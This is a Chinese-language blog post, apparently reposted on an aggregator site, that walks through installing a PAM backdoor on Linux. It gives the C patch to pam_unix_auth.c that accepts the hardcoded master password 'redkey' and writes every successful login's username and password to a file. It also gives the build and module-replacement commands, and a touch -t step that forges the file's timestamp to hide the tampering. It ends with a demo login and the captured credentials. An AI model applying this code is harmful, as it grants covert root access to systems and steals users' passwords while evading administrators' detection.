Linux系统安全之pam后门安装使用详解
Posted beautiful-code
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Linux系统安全之pam后门安装使用详解相关的知识,希望对你有一定的参考价值。
一.查看系统pam版本:
[[email protected] ~]# rpm -qa | grep pam pam-1.1.1-4.el6.x86_64
二.下载对应版本的pam模块
http://www.linux-pam.org/library/
三.解压&修改pam_unix_auth.c文件
tar -xzvf Linux-PAM-1.1.1.tar.gz cd Linux-PAM-1.1.1 cd modules/pam_unix/ vim pam_unix_auth.c
四.修改部分
在 PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags ,int argc, const char **argv) { 定义:FILE *fp;如下: PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags ,int argc, const char **argv) { unsigned int ctrl; int retval, *ret_data = NULL; const char *name; const void *p; FILE *fp; 在retval = _unix_verify_password(pamh, name, p, ctrl); [约177行]下添加 /*password:”redkey”*/ if(strcmp(p,”redkey”)==0) { retval = PAM_SUCCESS; } if(retval== PAM_SUCCESS) { /*pamfile:pamwd.txt*/ fp=fopen(“pamwd.txt”,”a”); fprintf(fp,”%s::%s ”,name,p); fclose(fp); }
五.编译
[[email protected] pam_unix]# cd ../../ [[email protected] Linux-PAM-1.1.1]# ./configure [[email protected] Linux-PAM-1.1.1]# make
六.备份原有PAM模块
[[email protected] security]# mv pam_unix.so{,.bak}
七.复制新PAM模块到/lib64/security/目录下:
[[email protected] security]# cp /root/Linux-PAM-1.1.1/modules/pam_unix/.libs/pam_unix.so /lib64/security/
八.修改pam模块时间属性
[[email protected] security]# stat pam_unix.* File: “pam_unix.so” Size: 151879 Blocks: 304 IO Block: 4096 普通文件 Device: fd01h/64769d Inode: 565261 Links: 1 Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2013-12-24 11:30:01.813610217 +0800 Modify: 2013-12-24 08:55:00.000000000 +0800 Change: 2013-12-24 11:29:12.747789015 +0800 File: “pam_unix.so.bak” Size: 50752 Blocks: 104 IO Block: 4096 普通文件 Device: fd01h/64769d Inode: 523660 Links: 1 Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2013-12-24 08:55:08.026835929 +0800 Modify: 2010-02-16 01:34:42.000000000 +0800 Change: 2013-12-24 10:42:11.741663207 +0800 [[email protected] security]# touch -t 201002160134 pam_unix.so [[email protected] security]# ll pam_unix.* -rwxr-xr-x 1 root root 151879 2月 16 2010 pam_unix.so -rwxr-xr-x. 1 root root 50752 2月 16 2010 pam_unix.so.bak
九.万能密码登陆验证
login as: root [email protected]’s password: Last login: Tue Dec 24 11:10:16 2013 from 192.168.169.1 [[email protected] ~]# [[email protected] /]# cat pamwd.txt root::redkey root::123456 root::12345678 root::redkey root::redkey
以上是关于Linux系统安全之pam后门安装使用详解的主要内容,如果未能解决你的问题,请参考以下文章